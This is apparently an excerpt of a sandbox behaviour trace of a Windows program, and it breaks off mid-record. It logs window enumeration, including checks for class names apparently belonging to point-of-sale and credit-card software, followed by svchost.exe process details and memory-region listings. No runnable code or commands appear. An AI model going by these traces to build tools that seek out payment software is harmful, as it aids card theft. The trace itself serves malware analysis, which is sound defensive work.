[0157.094] GetClassNameA (in: hWnd=0x102e6, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.094] GetClassNameA (in: hWnd=0x102e4, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.094] GetClassNameA (in: hWnd=0x102e2, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.094] GetClassNameA (in: hWnd=0x102e0, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.094] GetClassNameA (in: hWnd=0x102de, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.094] GetClassNameA (in: hWnd=0x102da, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.094] GetClassNameA (in: hWnd=0x102d8, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.094] GetClassNameA (in: hWnd=0x102d6, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.094] GetClassNameA (in: hWnd=0x102d4, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.094] GetClassNameA (in: hWnd=0x102d2, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.094] GetClassNameA (in: hWnd=0x102d0, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.094] GetClassNameA (in: hWnd=0x102ce, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.094] GetClassNameA (in: hWnd=0x102cc, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.094] GetClassNameA (in: hWnd=0x102ca, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.094] GetClassNameA (in: hWnd=0x102c8, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.094] GetClassNameA (in: hWnd=0x102c6, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.094] GetClassNameA (in: hWnd=0x102c4, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.094] GetClassNameA (in: hWnd=0x102c2, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.094] GetClassNameA (in: hWnd=0x102c0, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.094] GetClassNameA (in: hWnd=0x102be, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.095] GetClassNameA (in: hWnd=0x102bc, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.095] GetClassNameA (in: hWnd=0x102ba, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.095] GetClassNameA (in: hWnd=0x102b8, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.095] GetClassNameA (in: hWnd=0x102b6, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.095] GetClassNameA (in: hWnd=0x102b4, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.095] GetClassNameA (in: hWnd=0x102b2, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.095] GetClassNameA (in: hWnd=0x1026c, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.095] GetClassNameA (in: hWnd=0x10282, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.095] GetClassNameA (in: hWnd=0x10280, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.095] GetClassNameA (in: hWnd=0x1027e, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.095] GetClassNameA (in: hWnd=0x1027c, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.095] GetClassNameA (in: hWnd=0x1027a, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.095] GetClassNameA (in: hWnd=0x10278, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.095] GetClassNameA (in: hWnd=0x10276, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.095] GetClassNameA (in: hWnd=0x10274, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.095] GetClassNameA (in: hWnd=0x10272, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.095] GetClassNameA (in: hWnd=0x10270, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.095] GetClassNameA (in: hWnd=0x1026e, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.095] GetClassNameA (in: hWnd=0x1026a, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.095] GetClassNameA (in: hWnd=0x10268, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.095] GetClassNameA (in: hWnd=0x10266, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.096] GetClassNameA (in: hWnd=0x10262, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.096] GetClassNameA (in: hWnd=0x10260, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.096] GetClassNameA (in: hWnd=0x1025e, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.096] GetClassNameA (in: hWnd=0x10230, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.096] GetClassNameA (in: hWnd=0x1022e, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.096] GetClassNameA (in: hWnd=0x1022c, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.096] GetClassNameA (in: hWnd=0x1022a, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.096] GetClassNameA (in: hWnd=0x10228, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.096] GetClassNameA (in: hWnd=0x10226, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.096] GetClassNameA (in: hWnd=0x10224, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.096] GetClassNameA (in: hWnd=0x10222, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.096] GetClassNameA (in: hWnd=0x10220, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.096] GetClassNameA (in: hWnd=0x1020a, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.096] GetClassNameA (in: hWnd=0x10208, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.096] GetClassNameA (in: hWnd=0x10202, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.096] GetClassNameA (in: hWnd=0x10200, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.096] GetClassNameA (in: hWnd=0x101fc, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.096] GetClassNameA (in: hWnd=0x101fa, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.096] GetClassNameA (in: hWnd=0x101ca, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.096] GetClassNameA (in: hWnd=0x10156, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.097] GetClassNameA (in: hWnd=0x1011e, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.097] GetClassNameA (in: hWnd=0x10116, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.097] GetClassNameA (in: hWnd=0x1010c, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.097] GetClassNameA (in: hWnd=0x2009a, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.097] GetClassNameA (in: hWnd=0x2001a, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.097] GetClassNameA (in: hWnd=0x10040, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.097] GetClassNameA (in: hWnd=0x100fe, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0157.097] GetClassNameA (in: hWnd=0x20016, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.097] Sleep (dwMilliseconds=0x64) [0157.195] EnumWindows (lpEnumFunc=0x2593dd0, lParam=0x2580000) [0157.195] GetClassNameA (in: hWnd=0x30122, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="TaskSwitcherWnd") returned 15 [0157.195] GetClassNameA (in: hWnd=0x400a8, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.195] GetClassNameA (in: hWnd=0x300e2, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.195] GetClassNameA (in: hWnd=0x400b6, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.195] GetClassNameA (in: hWnd=0x101ce, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="SysFader") returned 8 [0157.195] GetClassNameA (in: hWnd=0x1012a, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="ATL:000007FEF43852C0") returned 20 [0157.195] GetClassNameA (in: hWnd=0x10070, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.195] GetClassNameA (in: hWnd=0x1006e, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.195] GetClassNameA (in: hWnd=0x1005a, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.195] GetClassNameA (in: hWnd=0x10086, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.195] GetClassNameA (in: hWnd=0x10078, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.195] GetClassNameA (in: hWnd=0x10076, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.195] GetClassNameA (in: hWnd=0x10072, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.195] GetClassNameA (in: hWnd=0x10052, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="Button") returned 6 [0157.195] GetClassNameA (in: hWnd=0x1004e, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="Shell_TrayWnd") returned 13 [0157.196] GetClassNameA (in: hWnd=0x100ee, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.196] GetClassNameA (in: hWnd=0x50092, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.196] GetClassNameA (in: hWnd=0x10088, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0157.196] GetClassNameA (in: hWnd=0x102a2, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="Feelapp") returned 7 [0157.196] GetClassNameA (in: hWnd=0x5014a, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="TASKENGINEWINDOWCLASS") returned 21 [0157.196] GetClassNameA (in: hWnd=0x8009c, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="DV2ControlHost") returned 14 [0157.196] GetClassNameA (in: hWnd=0x102b0, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="edcsvr_win") returned 10 [0157.196] GetClassNameA (in: hWnd=0x102ae, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="fpos_wnd") returned 8 [0157.196] GetClassNameA (in: hWnd=0x102ac, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="isspos_cls") returned 10 [0157.196] GetClassNameA (in: hWnd=0x102aa, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="mxslipstream") returned 12 [0157.196] GetClassNameA (in: hWnd=0x102a8, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="omniposcls") returned 10 [0157.196] GetClassNameA (in: hWnd=0x102a6, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="spcwinapp") returned 9 [0157.196] GetClassNameA (in: hWnd=0x102a4, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="spgagentserviceclass") returned 20 [0157.196] GetClassNameA (in: hWnd=0x300bc, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.196] GetClassNameA (in: hWnd=0x400c6, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="AUTHUI.DLL: Shutdown Choices Message Window") returned 43 [0157.196] GetClassNameA (in: hWnd=0x400e4, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="_SearchEditBoxFakeWindow") returned 24 [0157.196] GetClassNameA (in: hWnd=0x300d4, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.196] GetClassNameA (in: hWnd=0x300c0, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.196] GetClassNameA (in: hWnd=0x400ba, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.197] GetClassNameA (in: hWnd=0x300a2, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="Desktop User Picture") returned 20 [0157.197] GetClassNameA (in: hWnd=0x102a0, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="creditservice_") returned 14 [0157.197] GetClassNameA (in: hWnd=0x1029e, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="centralcreditcardclass") returned 22 [0157.197] GetClassNameA (in: hWnd=0x1029c, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="ccv_serverwindow") returned 16 [0157.197] GetClassNameA (in: hWnd=0x1029a, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="leechftpwindow") returned 14 [0169.959] EnumWindows (lpEnumFunc=0x2593dd0, lParam=0x2580000) returned 1 [0169.982] Sleep (dwMilliseconds=0x64) [0170.118] EnumWindows (lpEnumFunc=0x2593dd0, lParam=0x2580000) [0182.418] EnumWindows (lpEnumFunc=0x2593dd0, lParam=0x2580000) [0182.458] Sleep (dwMilliseconds=0x64) [0182.709] EnumWindows (lpEnumFunc=0x2593dd0, lParam=0x2580000) [0183.451] EnumWindows (lpEnumFunc=0x2593dd0, lParam=0x2580000) returned 1 [0183.479] Sleep (dwMilliseconds=0x64) [0183.655] EnumWindows (lpEnumFunc=0x2593dd0, lParam=0x2580000) [0189.903] Sleep (dwMilliseconds=0x64) [0190.142] EnumWindows (lpEnumFunc=0x2593dd0, lParam=0x2580000) [0204.068] EnumWindows (lpEnumFunc=0x2593dd0, lParam=0x2580000) [0240.485] EnumWindows (lpEnumFunc=0x2593dd0, lParam=0x2580000) [0251.347] EnumWindows (lpEnumFunc=0x2593dd0, lParam=0x2580000) [0251.396] Sleep (dwMilliseconds=0x64) [0251.511] EnumWindows (lpEnumFunc=0x2593dd0, lParam=0x2580000) [0262.183] Sleep (dwMilliseconds=0x64) [0262.291] EnumWindows (lpEnumFunc=0x2593dd0, lParam=0x2580000) [0283.579] EnumWindows (lpEnumFunc=0x2593dd0, lParam=0x2580000) Thread: id = 178 os_tid = 0xff0 Process: id = "4" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xa35b000" os_pid = "0x360" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x1c8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d101" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1107 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1108 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 1109 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1110 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1111 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1112 start_va = 0xd0000 end_va = 0x136fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1113 start_va = 0x140000 end_va = 0x140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1114 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1115 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 1116 start_va = 0x170000 end_va = 0x170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 1117 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 1118 start_va = 0x190000 end_va = 0x19afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "gpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui") Region: id = 1119 start_va = 0x1a0000 end_va = 0x1acfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 1120 start_va = 0x1b0000 end_va = 0x1b3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskcomp.dll.mui" filename = "\\Windows\\System32\\en-US\\taskcomp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\taskcomp.dll.mui") Region: id = 1121 start_va = 0x1c0000 end_va = 0x1c9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "schedsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\schedsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\schedsvc.dll.mui") Region: id = 1122 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1123 start_va = 0x1e0000 end_va = 0x2dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1124 start_va = 0x2e0000 end_va = 0x3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 1125 start_va = 0x3e0000 end_va = 0x3e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1126 start_va = 0x3f0000 end_va = 0x3f3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1127 start_va = 0x400000 end_va = 0x401fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1128 start_va = 0x410000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000e.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db") Region: id = 1129 start_va = 0x440000 end_va = 0x443fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1130 start_va = 0x450000 end_va = 0x45dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 1131 start_va = 0x460000 end_va = 0x467fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 1132 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 1133 start_va = 0x480000 end_va = 0x607fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 1134 start_va = 0x610000 end_va = 0x790fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 1135 start_va = 0x7a0000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 1136 start_va = 0x860000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1137 start_va = 0x8e0000 end_va = 0x8e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 1138 start_va = 0x8f0000 end_va = 0x90bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "firewallapi.dll.mui" filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui") Region: id = 1139 start_va = 0x910000 end_va = 0x910fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 1140 start_va = 0x920000 end_va = 0x920fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 1141 start_va = 0x930000 end_va = 0x931fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 1142 start_va = 0x9b0000 end_va = 0x9b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshtcpip.dll.mui" filename = "\\Windows\\System32\\en-US\\wshtcpip.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshtcpip.dll.mui") Region: id = 1143 start_va = 0x9c0000 end_va = 0x9c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wship6.dll.mui" filename = "\\Windows\\System32\\en-US\\wship6.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wship6.dll.mui") Region: id = 1144 start_va = 0x9d0000 end_va = 0xa4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 1145 start_va = 0xa50000 end_va = 0xab5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 1146 start_va = 0xac0000 end_va = 0xb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 1147 start_va = 0xb40000 end_va = 0xb40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b40000" filename = "" Region: id = 1148 start_va = 0xb50000 end_va = 0xbcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 1149 start_va = 0xbd0000 end_va = 0xe9efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1150 start_va = 0xea0000 end_va = 0xea0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 1151 start_va = 0xeb0000 end_va = 0xf2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 1152 start_va = 0xf30000 end_va = 0xf49fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 1153 start_va = 0xf50000 end_va = 0xf50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 1154 start_va = 0xf60000 end_va = 0xf60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f60000" filename = "" Region: id = 1155 start_va = 0xf70000 end_va = 0xf77fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 1156 start_va = 0xf80000 end_va = 0xf8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f80000" filename = "" Region: id = 1157 start_va = 0xf90000 end_va = 0xf9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 1158 start_va = 0xfa0000 end_va = 0xfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 1159 start_va = 0x1030000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001030000" filename = "" Region: id = 1160 start_va = 0x1040000 end_va = 0x104ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001040000" filename = "" Region: id = 1161 start_va = 0x1050000 end_va = 0x105ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001050000" filename = "" Region: id = 1162 start_va = 0x1060000 end_va = 0x106ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001060000" filename = "" Region: id = 1163 start_va = 0x1070000 end_va = 0x107ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001070000" filename = "" Region: id = 1164 start_va = 0x1080000 end_va = 0x108ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001080000" filename = "" Region: id = 1165 start_va = 0x1090000 end_va = 0x1090fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 1166 start_va = 0x10a0000 end_va = 0x111ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 1167 start_va = 0x1120000 end_va = 0x1121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 1168 start_va = 0x1130000 end_va = 0x11affff monitored = 1 entry_point = 0x0 region_type = private name 